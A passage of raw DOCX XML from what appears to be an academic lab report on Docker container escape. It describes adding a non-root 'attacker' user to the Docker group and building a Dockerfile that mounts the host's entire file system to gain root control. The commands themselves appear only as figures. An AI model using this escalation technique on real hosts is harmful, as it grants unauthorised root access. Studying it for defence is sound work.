      </w:r>
      <w:r w:rsidR="00500A61">
        <w:t xml:space="preserve"> verifies that the </w:t>
      </w:r>
      <w:r w:rsidR="00267FB1">
        <w:t xml:space="preserve">attacker user is not a member of the </w:t>
      </w:r>
      <w:r w:rsidR="00267FB1">
        <w:lastRenderedPageBreak/>
        <w:t>root users</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t xml:space="preserve"> the ultimate goal </w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t>is to</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t xml:space="preserve"> compromise and control the host machine without knowing its root password and elevate the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t>the root groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B0040" w14:textId="427E5B73" w:rsidR="00715F67" w:rsidRDefault="00715F67" w:rsidP="00715F67">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFAB7AB" wp14:editId="164F004B">
            <wp:extent cx="4526979" cy="2501900"/>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38025" cy="2508005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="048717BC" w14:textId="4C09CF31" w:rsidR="00715F67" w:rsidRDefault="00715F67" w:rsidP="00715F67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc86858611"/>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: output </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="00715F67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo visudo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="0941DE63" w14:textId="342B1913" w:rsidR="002A6FBC" w:rsidRDefault="002A6FBC" w:rsidP="002A6FBC">
      <w:r>
        <w:t xml:space="preserve">However, the user </w:t>
      </w:r>
      <w:r w:rsidR="008C21B4">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00F465EF">
        <w:t xml:space="preserve">needs to have Docker permission in order to interact with Docker. Thus, the user is added to the Docker group using the command in figure </w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="00F465EF">
        <w:t xml:space="preserve">. This implies that the user can </w:t>
      </w:r>
      <w:r w:rsidR="008C21B4">
        <w:t>run and interact with Docker</w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t>. Figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t xml:space="preserve"> is the output of the </w:t>
      </w:r>
      <w:r w:rsidR="0041050A" w:rsidRPr="00A33322">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>getent group</w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t xml:space="preserve"> Linux command, showing that the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00A33322">
        <w:t xml:space="preserve">is part of </w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t>the Docker group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731575FE" w14:textId="77777777" w:rsidR="00363029" w:rsidRDefault="00363029" w:rsidP="002A6FBC"/>
    <w:p w14:paraId="4156920B" w14:textId="7F4B85B2" w:rsidR="00F465EF" w:rsidRDefault="00F465EF" w:rsidP="00F465EF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3425D094" wp14:editId="317D2A46">
            <wp:extent cx="4438650" cy="742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38650" cy="742950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5504D7" w14:textId="20E4CAB2" w:rsidR="00F465EF" w:rsidRDefault="00F465EF" w:rsidP="00F465EF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc86858612"/>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F465EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: user added to the Docker group.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="6C495458" w14:textId="07C2B6AB" w:rsidR="0041050A" w:rsidRDefault="0041050A" w:rsidP="0041050A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DEB334F" wp14:editId="2B878E8D">
            <wp:extent cx="3162300" cy="2082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62300" cy="2082800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33053A79" w14:textId="394A05F0" w:rsidR="0041050A" w:rsidRPr="00D331CB" w:rsidRDefault="0041050A" w:rsidP="00D331CB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc86858613"/>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0041050A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: output of the getent group command.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="78A9F1A4" w14:textId="2052F7FD" w:rsidR="0049257F" w:rsidRDefault="00A213D1" w:rsidP="0049257F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="007F7E38">
        <w:t>following steps and procedures have been used to build the platform for the attacker</w:t>
      </w:r>
      <w:r w:rsidR="005D38BA">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="0049257F">
        <w:t>Dockerfile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0060C8" w14:textId="33918A51" w:rsidR="0049257F" w:rsidRDefault="00267FB1" w:rsidP="0049257F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A file directory named escape is created on the home directory of the attacker user</w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t xml:space="preserve">, as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>. Its</w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t xml:space="preserve"> primary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> purpose is </w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">store and save </w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t>the Dockerfile created by the attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00AE0044">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D04A88" w14:textId="18FBB161" w:rsidR="00AE0044" w:rsidRDefault="00AE0044" w:rsidP="00AE0044">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6739B261" wp14:editId="7B50211C">
            <wp:extent cx="3219450" cy="609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19450" cy="609600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD0A451" w14:textId="42B6965D" w:rsidR="00AE0044" w:rsidRDefault="00AE0044" w:rsidP="00AE0044">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc86858614"/>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: creating file directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>for the attacker.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="6A20049D" w14:textId="320DE07C" w:rsidR="002A6FBC" w:rsidRDefault="002A6FBC" w:rsidP="0041050A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Dockerfile shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is created using </w:t>
      </w:r>
      <w:r w:rsidR="005230C8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>vim text editor. It is built based on wheezy</w:t>
      </w:r>
      <w:r w:rsidR="005230C8">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lightweight Linux Debian distribution.</w:t>
      </w:r>
      <w:r w:rsidR="005230C8">
        <w:t xml:space="preserve"> This Dockerfile provides the baseline to create </w:t>
      </w:r>
      <w:r w:rsidR="00B734C6">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="005230C8">
        <w:t>image, enabling the attacker to mount the whole file system automatically.</w:t>
      </w:r>
      <w:r w:rsidR="0059704F">
        <w:t xml:space="preserve"> The ENV variable is used to specify </w:t>
      </w:r>
      <w:r w:rsidR="00ED0735">
        <w:t>where the attacker wants to work. Simply put, it is used as a working directory acting as the mount point for the file system. The RUN command execute</w:t>
      </w:r>
      <w:r w:rsidR="00A22A38">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00ED0735">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED0735" w:rsidRPr="00ED0735">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:r w:rsidR="00E74226">
        <w:t xml:space="preserve"> to create </w:t>
      </w:r>
      <w:r w:rsidR="0099797A">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E74226">
        <w:t>directory where the Docker image works within the current or parent directory, in this case, with</w:t>
      </w:r>
      <w:r w:rsidR="00B734C6">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00E74226">
        <w:t xml:space="preserve"> the /attacker ENV variable.</w:t>
      </w:r>
      <w:r w:rsidR="0099797A">
        <w:t xml:space="preserve"> Eventually, this Dockerfile allows the attacker inside a container to mount the whole file system</w:t>
      </w:r>
      <w:r w:rsidR="00FC5E2E">
        <w:t xml:space="preserve"> of the Docker host machine</w:t>
      </w:r>
      <w:r w:rsidR="0099797A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2652C515" w14:textId="7E51C127" w:rsidR="0049257F" w:rsidRDefault="002A6FBC" w:rsidP="002A6FBC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="571CBEF4" wp14:editId="09AAF3A5">
            <wp:extent cx="3751865" cy="225425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52112" cy="2254398"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BE88F" w14:textId="4B2F9BCA" w:rsidR="002A6FBC" w:rsidRDefault="002A6FBC" w:rsidP="002A6FBC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc86858615"/>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">creating the </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dockerfile.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="77DEBDA9" w14:textId="3096C7D1" w:rsidR="00420F9C" w:rsidRPr="00420F9C" w:rsidRDefault="00320B5F" w:rsidP="00420F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>At this stage, the Docker image is ready and is built using the command shown in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>. The image is tagged as attacker just for simplicity and clarity, but it can also be tagged with different names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E3E8C" w14:textId="0110E5CE" w:rsidR="0099797A" w:rsidRDefault="00420F9C" w:rsidP="00420F9C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7776C5EF" wp14:editId="09D665ED">
            <wp:extent cx="3816268" cy="2844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17120" cy="2845435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CC5DD" w14:textId="527369A5" w:rsidR="00420F9C" w:rsidRDefault="00420F9C" w:rsidP="00420F9C">
      <w:pPr>
